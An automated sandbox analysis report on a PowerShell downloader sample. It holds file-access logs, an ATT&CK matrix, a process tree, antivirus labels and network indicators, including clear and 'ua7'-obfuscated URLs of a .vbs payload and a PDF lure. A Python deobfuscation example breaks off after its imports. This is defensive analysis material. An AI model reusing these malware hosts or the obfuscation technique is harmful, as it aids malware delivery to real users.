      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.LocalAccounts\1.0.0.0\Microsoft.PowerShell.LocalAccounts.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package0513~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Windows.StartLayout.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.Windows.StartLayout.Commands.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package0012~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-UEV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\UEV\Microsoft.Uev.Commands.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Whea\Microsoft.Windows.Whea.WheaMemoryPolicy.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\WindowsErrorReporting\Microsoft.WindowsErrorReporting.PowerShell.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.WindowsSearch.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsSearch.Commands.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Program Files (x86)\AutoIt3\AutoItX\AutoItX3.PowerShell.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exe | Queries volume information (13 events, collapsed):
- C:\ProgramData\Microsoft\Network\Downloader\edb.chk (×3)
- C:\ProgramData\Microsoft\Network\Downloader\edb.log (×4)
- C:\ProgramData\Microsoft\Network\Downloader\qmgr.db (×3)
- C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm (×1)
- C:\ (×2)

Reading note: these are the job database files of the Background Intelligent Transfer Service (BITS); the svchost.exe instance hosting BITS touches them as part of its own housekeeping, and nothing in this section ties that activity to the sample.
MITRE ATT&CK matrix (flattened from the report's 14-column grid and listed per tactic; a leading number is the report's badge count for that technique as it appeared in the flattened cells, techniques without a number are the matrix's unflagged placeholders):

Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties
Resource Development: 1 Scripting; Domains; DNS Server; Virtual Private Server; Server; Botnet
Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media
Execution: 1 PowerShell; Scheduled Task/Job; At; Cron; Launchd; Scheduled Task
Persistence: 1 Scripting; 1 Registry Run Keys / Startup Folder; 1 DLL Side-Loading; Login Hook; Network Logon Script; RC Scripts
Privilege Escalation: 11 Process Injection; 1 Registry Run Keys / Startup Folder; 1 DLL Side-Loading; Login Hook; Network Logon Script; RC Scripts
Defense Evasion: 11 Masquerading; 31 Virtualization/Sandbox Evasion; 11 Process Injection; 1 Obfuscated Files or Information; 1 DLL Side-Loading; Steganography
Credential Access: OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials
Discovery: 11 Security Software Discovery; 1 Process Discovery; 31 Virtualization/Sandbox Evasion; 1 Application Window Discovery; 2 File and Directory Discovery; 21 System Information Discovery
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC
Collection: 1 Archive Collected Data; Data from Removable Media; Data from Network Shared Drive; Input Capture; Keylogging; GUI Input Capture
Command and Control: 11 Encrypted Channel; 3 Ingress Tool Transfer; 3 Non-Application Layer Protocol; 4 Application Layer Protocol; Fallback Channels; Multiband Communication
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits
Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop
Behavior graph (ID 1578234; sample raEyjKggAf.ps1; start date 19/12/2024; architecture WINDOWS; score 84), rendered as text:

Network endpoints
- x1.i.lencr.org
- www.bluemaxxlaser.com (203.175.174.69), port 80 from local port 49720, SGGS-AS-AP SGGSSG, Singapore; contacted by powershell.exe
- astenterprises.com.pk (107.161.23.150), port 443 from local port 49714, RAMNODE US, United States; contacted by powershell.exe
- 2 other IPs or domains
- 127.0.0.1 (unknown); contacted by svchost.exe

Sample-level signatures: Antivirus / Scanner detection for submitted sample; Multi AV Scanner detection for submitted file; Yara detected Powershell download and execute; 3 other signatures

Process tree
- powershell.exe (report badges 16, 23); signature: Powershell creates an autostart link
  - powershell.exe (report badge 23); signature: Loading BitLocker PowerShell Module
  - Acrobat.exe (report badges 20, 73)
    - AcroCEF.exe (report badge 106)
      - AcroCEF.exe
  - conhost.exe
- svchost.exe; contacts 127.0.0.1

Antivirus detection, submitted sample:
Source | Detection | Scanner | Label
raEyjKggAf.ps1 | 31% | Virustotal | (Browse link)
raEyjKggAf.ps1 | 34% | ReversingLabs | Script-PowerShell.Downloader.Boxter
raEyjKggAf.ps1 | 100% | Avira | TR/PShell.Dldr.VPA
No Antivirus matches (reported for each of the three AV tables that follow the sample table; their headings were lost in extraction)
URL scanning:
Source | Detection | Scanner | Label
http://www.microsoft.cox | 0% | Avira URL Cloud | safe
https://www.astenterprises.com.pk/ms/List | 0% | Avira URL Cloud | safe
http://www.bluua7maxxlasua7r.com/ms/ms.vbs | 0% | Avira URL Cloud | safe
https://www.astua7ntua7rprisua7s.com.pk/ms/List%20of%20rua7quirua7d%20itua7ms%20and%20sua7rvicua7s.p | 0% | Avira URL Cloud | safe

Reading note: the last two entries are the URLs as the script stores them, with every letter "e" replaced by the token "ua7"; the network-observed requests further down (http://www.bluemaxxlaser.com/ms/ms.vbs and https://www.astenterprises.com.pk/ms/List%20of%20required%20items%20and%20services.pdf) are the same URLs with the substitution undone. A reputation lookup on the obfuscated spelling is a lookup on a host that does not exist, so the 0% / safe verdicts on these rows carry no information; the first two rows are truncated strings and the same caveat applies.
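The "ua7" spellings in the table above are the sample's URL strings as they sit in memory, and the network tables further down show the same URLs with every "e" in place. The following Python is an added example, not code from the report or from the sample: it recovers the clear URLs from the dumped strings, infers the substituted letter by testing candidates against the hostnames the sandbox actually resolved, and checks each result against the observed requests. Every input string is copied from this report's tables; the TOKEN constant and the inference logic are the example's own.

```python
"""Recover and cross-check the URLs this script hides behind a substitution token.

Added example, not from the report or the sample. All strings below are copied
from the report's memory-string, contacted-domain and URL tables; the inference
of the substituted letter is this example's own logic.
"""
import string
from urllib.parse import urlsplit, unquote

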